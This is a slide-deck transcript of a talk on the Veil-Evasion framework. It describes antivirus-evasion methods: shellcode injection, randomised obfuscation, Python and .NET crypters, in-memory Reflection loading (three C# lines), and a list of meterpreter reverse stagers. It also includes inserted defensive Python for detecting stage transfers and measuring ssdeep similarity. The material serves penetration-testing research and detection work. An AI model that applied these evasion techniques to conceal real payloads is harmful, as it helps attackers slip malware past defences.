    ● Mark Baggett’s post Tips for Evading Anti-Virus During Pen Testing was the first public resource to talk about using Python to inject shellcode
    ● We ended up mostly drawing from Debasish Mandal's Execute ShellCode Using Python
      o Uses the VirtualAlloc/CreateThread/WaitForSingleObject pattern

  • 9. Our Solution
    ● A way to get around antivirus as easily as professional malware
      o don’t want to roll our own backdoor each time
      o codebase built by myself, @ChrisTruncer and @TheMightyShiv
    ● Generate payloads in a language and technique agnostic way
    ● See the Shmoocon ‘14 presentation AV Evasion with the Veil-Framework for more background

  • 11. Ethical Issues
    ● The disclosure debate is nothing new...
    ● Pentesters are 5+ years behind the professional malware community
    ● This is a problem the bad guys have already solved, and better than we have!

  • 12. Public Reaction
    “surely this will just result in 21 new signatures for all major AVs and then we're back to square one?”
    “Isn't our entire field meant to be working towards increasing security, rather than handing out fully functioning weapons?”
    “The other point here is that anything that helps to expose how in-effective AV really is at stopping even a minimally sophisticated attacker is a good thing.”
    http://www.reddit.com/r/netsec/comments/1fc2xp/veil_a_metasploit_payload_generator_for_bypassing/

  • 14. Approaches
    ● We started with Python based shellcode injection techniques, soon branched into other languages
    ● Similar payloads = :(
      o started implementing basic obfuscation methods
      o and by basic, we mean basic
    ● static signatures = #avlol

  • 15. Obfuscation 1.0
    ● Let’s randomize everything we possibly can
      o This works better than you think
    ● Substitute in a randomized string for all variable and method names
    ● Shuffle up everything as appropriate

  • 17. “Pyherion”
    ● What if vendors still find a way to trigger on the malicious Python script sources?
    ● We introduced Pyherion, a python ‘crypter’ inspired by Hyperion
    ● Encrypts an entire Python file with a random AES key, base64’s it and rolls it all up into an exec(*) wrapper

  • 20. Obfuscation 1.5: Pure Stagers
    ● What if vendors are triggering on the raw shellcode and decoders?
    ● How about we eliminate shellcode altogether, and build some native stagers?
    ● They aren’t that complicated, thanks Raffi!
      o https://github.com/rsmudge/metasploit-loader
      o http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
  • 21. Pure Stagers
    The meterpreter stager is surprisingly simple:
    1) a tcp connection is opened to the handler
    2) the handler spits back 4 bytes indicating the .dll size, and then the .dll itself
    3) socket number is pushed into EDI
    4) execution is passed to the .dll just like we do regular shellcode (void * or VirtualAlloc)
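The staging exchange on this slide is also what a defender can look for on the wire. The following is an added example, not code from the deck, Veil or Metasploit: it classifies the first bytes a handler sends back (a 4-byte stage length followed by the DLL). It assumes the length is a little-endian uint32 and that the stage begins with an MZ header whose e_lfanew reaches a PE signature; the size bounds and the sample bytes are constructed.

```python
"""Heuristic for the handler->stager side of the plain-TCP staging exchange.

Added example (not from the deck, Veil or Metasploit). Assumptions, labelled:
the 4-byte length is a little-endian uint32, the stage starts with a DOS "MZ"
header with a valid e_lfanew, and the size bounds below are constructed
guesses rather than values from the deck.
"""
import struct

MZ = b"MZ"
MIN_STAGE = 64 * 1024          # assumption: a real stage is much bigger than this
MAX_STAGE = 16 * 1024 * 1024   # assumption: and much smaller than this


def inspect_server_bytes(data: bytes) -> dict:
    """Classify the first bytes the remote handler sent on a TCP stream.

    Returns 'staged_dll' plus the fields that drove the verdict, so an analyst
    can see which test passed or failed on a partial capture.
    """
    if len(data) < 4 + len(MZ):
        return {"staged_dll": False, "reason": "too short"}
    declared = struct.unpack("<I", data[:4])[0]
    if not MIN_STAGE <= declared <= MAX_STAGE:
        return {"staged_dll": False, "reason": "length out of range", "declared": declared}
    body = data[4:]
    if body[:2] != MZ:
        return {"staged_dll": False, "reason": "no MZ after length prefix", "declared": declared}
    # Second check once enough bytes are in: follow e_lfanew to the PE signature.
    pe_signature = None
    if len(body) >= 0x40:
        e_lfanew = struct.unpack("<I", body[0x3C:0x40])[0]
        if len(body) >= e_lfanew + 4:
            pe_signature = body[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return {
        "staged_dll": True,
        "declared": declared,
        "seen": len(body),
        "complete": len(body) >= declared,
        "pe_signature": pe_signature,
    }


def build_constructed_exchange(size=100_000) -> bytes:
    """Constructed sample of the handler's reply: length prefix + fake MZ/PE stage.

    Synthetic zero padding, not a real stage; only the header fields that
    inspect_server_bytes() examines are filled in.
    """
    stage = bytearray(size)
    stage[0:2] = MZ
    stage[0x3C:0x40] = struct.pack("<I", 0x80)   # e_lfanew -> PE signature offset
    stage[0x80:0x84] = b"PE\0\0"
    return struct.pack("<I", size) + bytes(stage)


if __name__ == "__main__":
    print(inspect_server_bytes(build_constructed_exchange()))
    print(inspect_server_bytes(build_constructed_exchange()[:1000]))  # partial capture
    print(inspect_server_bytes(b"HTTP/1.1 200 OK\r\n"))               # ordinary web reply
```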
  • 22. Pure Stagers
    ● The following are the pure stagers currently available in the framework:
      Language    Stager
      Python      meterpreter/reverse_tcp
      Python      meterpreter/reverse_http
      Python      meterpreter/reverse_https
      C           meterpreter/reverse_tcp
      C           meterpreter/reverse_tcp_service
      C           meterpreter/reverse_http
      C           meterpreter/reverse_http_service

  • 23. Pure Stagers
      Language    Stager
      C#          meterpreter/reverse_tcp
      C#          meterpreter/reverse_http
      C#          meterpreter/reverse_https
      Powershell  meterpreter/reverse_tcp
      Powershell  meterpreter/reverse_http
      Powershell  meterpreter/reverse_https
      Ruby        meterpreter/reverse_tcp

  • 24. Obfuscation 2.0
    ● Variable obfuscation is great
    ● But for things like C, this doesn’t work as well as we’d like
    ● Can we introduce something a little more interesting?

  • 25. Obfuscation 2.0
    ● Our (slightly) more “advanced” C obfuscation involves our interpretation of a method nop
      o muck up dynamic analysis without affecting the actual execution of the program
    ● General idea:
      o throw in enough processing functions that sufficiently complicate the call tree of the program
    ● This is a basic version of what malware has been doing for years
      o shouldn’t be that effective, but it is!

  • 26. Obfuscation 2.0
    ● Choose a set of randomized string processing functions (reverse, split, etc.)
    ● Malloc a randomized number of strings of randomized lengths
    ● Intersperse these randomized functions throughout the actual code

  • 28. Obfuscation 3.0
    ● What if some vendors trigger on the Pyinstaller loader.exe itself?
    ● How about a (reasonably) obfuscated version of the Pyinstaller loader? :)
      o BSides Boston ‘14: Pwnstaller 1.0
      o https://github.com/harmj0y/pwnstaller/
    ● Integrated into Veil-Evasion this past May

  • 29. Pwnstaller
    ● On each run:
      o Obfuscated code for all* source files associated with the Pyinstaller launcher is generated
      o mingw32 is used to compile everything into a new runw.exe, all on Kali \m/
      o copy the runw.exe into the correct location
      o a randomized Windows icon is chosen for the final packaged result
    *see http://www.harmj0y.net/blog/python/pwnstaller-1-0/ for a full explanation

  • 30. Obfuscation 4.0: Ruby
    ● Since some people have started to pay attention to Pyinstaller binaries, let’s try some other languages:
    ● C? sure, with some obfuscation
    ● C#? mono can help with .NET
    ● PowerShell? no disk writes? awesome
    ● Ruby? Why not...

  • 31. Ruby
    ● Ruby has a foreign function interface just like Python does, the win32-api gem
      o This means we can inject shellcode, and can write native Meterpreter stagers!
    ● And it has its own Pyinstaller analogue: OCRA (One Click Ruby application)
      o http://ocra.rubyforge.org/
    ● I wonder if we can get this running on Kali :)

  • 34. Ruby Module Releases
    ● The following payload modules are currently in the development branch, and will be merged into master for the 9/15/2014 V-Day:
      o ruby/shellcode_inject/flat
      o ruby/meterpreter/reverse_tcp
    ● Everything is compiled to a self-extracting Windows executable, all on Kali!

  • 35. A .NET Crypter
    ● C#/VB.net code is compiled, not interpreted, so we can’t build a dynamic obfuscator equivalent to Pyherion :(
    ● Or can we? .NET has an interesting feature called Reflection:
      o “you can use reflection to create type instances at run time, and to invoke and access them”
      http://msdn.microsoft.com/en-us/library/f7ykdhsy(v=vs.110).aspx

  • 36. A .NET Crypter
    ● If we have an array of raw bytes of a .NET binary, we can run the entire executable from memory with 3 lines by utilizing Reflection:
      o Assembly a = Assembly.Load(bytes);
      o MethodInfo m = a.EntryPoint;
      o m.Invoke(a.CreateInstance(m.Name), null);
    ● We can obfuscate these bytes in any way we want beforehand

  • 37. Arya: a .NET Crypter
    ● A crypter for all .NET binaries was just pushed along with the Ruby payloads
    ● A payload binary is generated and compiled as normal, the crypter then:
      o reads in the raw bytes
      o base64 encodes the data and builds a random substitution cipher for the string
      o builds a launcher/dropper that decodes the raw data and invokes the original binary using Reflection

  • 40. ssdeep
    ● ssdeep is a ‘fuzzy hashing’ static malware comparison tool, allowing for the comparison of malware families
    ● “can match inputs that have homologies”
      o biology term, fancy way of saying degree of shared ancestry
    ● Generated 1000 samples of some payload families and did ssdeep runs over each set

  • 41. python/meterpreter/rev_tcp
    ● (1000 choose 2) = 499500 possible pairing combinations for ssdeep
    ● 169107 pairings (33.8%) matched at a score of 75/100 or better
      o Only 66 (.01%) scored at 90/100 or better
      o Average pairwise score: 74
    ● What this means: only .01% of the samples scored as a ‘similar’ malware family

  • 43. c/meterpreter/rev_tcp
    ● Same 499500 possible pairings
    ● 267387 pairings (53.5%) matched at a score of 25/100 or better
      o Only 2615 (0.5%) scored at 90/100 or better
      o Average pairwise score: 37
    ● What this means: only .5% of the samples scored as a ‘similar’ malware family
      o but wider variation than Python families
  • 45. cs/shellcode_inject/flat w/ Arya
    ● Same 499500 possible pairings
    ● Only 5 pairings (0.001%) matched at a score of 25/100 or better
      o none scored at 90/100 or better
    ● What this means: 0% of the samples scored as a ‘similar’ malware family
      o variation was all over the map!
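To make the ssdeep methodology behind slides 40 to 45 concrete, here is an added example (not the deck's own scripts) that computes the same family statistics over every (n choose 2) pairing: pairs at or above a threshold, pairs at 90 or better, and the mean pairwise score. ssdeep itself is not bundled, so compare_hashes() is a labelled stand-in that keeps ssdeep's block-size and 7-character-window rules but scores with a difflib ratio; the sample hashes are constructed.

```python
"""Pairwise fuzzy-hash statistics over a payload family (slides 40-45).

Added example, not the deck's own tooling. compare_hashes() is a labelled
stand-in for ssdeep's comparison: it keeps ssdeep's rules that block sizes
must be equal or differ by a factor of two and that the block hashes must
share a 7-character run, but scores with a difflib ratio instead of ssdeep's
weighted edit distance. family_stats() reports what the deck reports.
"""
from difflib import SequenceMatcher
from itertools import combinations
from statistics import mean

ROLLING_WINDOW = 7   # ssdeep scores two strings only if they share a 7-char run


def parse_hash(h: str):
    """Split 'blocksize:hash1:hash2' into (int, str, str)."""
    block, a, b = h.split(":", 2)
    return int(block), a, b


def _shares_window(a: str, b: str) -> bool:
    return any(a[i:i + ROLLING_WINDOW] in b
               for i in range(len(a) - ROLLING_WINDOW + 1))


def _score(a: str, b: str) -> int:
    if not _shares_window(a, b):
        return 0
    return round(100 * SequenceMatcher(None, a, b).ratio())


def compare_hashes(h1: str, h2: str) -> int:
    """0..100 similarity; hash2 of the smaller block is matched against hash1 of the larger."""
    bs1, a1, b1 = parse_hash(h1)
    bs2, a2, b2 = parse_hash(h2)
    if bs1 == bs2:
        return max(_score(a1, a2), _score(b1, b2))
    if bs1 == 2 * bs2:
        return _score(a1, b2)
    if bs2 == 2 * bs1:
        return _score(b1, a2)
    return 0


def family_stats(hashes, threshold=75, compare=compare_hashes) -> dict:
    """Compare every pair once, as the deck did for its 1000-sample families."""
    scores = [compare(x, y) for x, y in combinations(hashes, 2)]
    pairs = len(scores)
    matched = sum(s >= threshold for s in scores)
    strong = sum(s >= 90 for s in scores)
    return {
        "pairings": pairs,
        "matched": matched,
        "matched_pct": round(100 * matched / pairs, 2),
        "strong": strong,
        "strong_pct": round(100 * strong / pairs, 3),
        "mean_score": round(mean(scores), 1),
    }


# Constructed sample family: two near-identical members, one unrelated member,
# and one hashed at double the block size (exercises the cross-block compare).
SAMPLE_FAMILY = [
    "96:abcdefghijklmnop:ABCDEFGH",
    "96:abcdefghijklmnoq:ABCDEFGX",
    "96:zzzzzzzzzzzzzzzz:QQQQQQQQ",
    "192:ABCDEFGHIJ:ZZZZZZZZ",
]

if __name__ == "__main__":
    print(family_stats(SAMPLE_FAMILY))
```

Swap a real `ssdeep.compare` in for the `compare` argument to reproduce the deck's numbers on actual payload sets.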
  • 46. Recap
    ● Started our research out of necessity but continued it out of curiosity
    ● Fuxoring AV vendors really isn’t that difficult
    ● There are still ways to stop us :)
    ● #avlol

  • 47. Questions?
    ● Contact me:
      o @harmj0y
      o harmj0y@veil-framework.com
    ● Read more:
      o https://www.veil-framework.com
    ● Get the goods:
      o https://www.github.com/Veil-Framework/Veil
      o https://github.com/HarmJ0y/stagers

Editor's Notes

  1. correct this?
  2. Kept burning time on limited-time engagements
  3. From this
  4. To this
  5. “Post up soon”
  6. “available with use_arya for all C#/VB.net modules”
  7. totally beta presentation, brainstorming...
  8. aka “context triggered piecewise hashes” ssdeep runs -> pairwise comparisons
  9. graph too small to show lol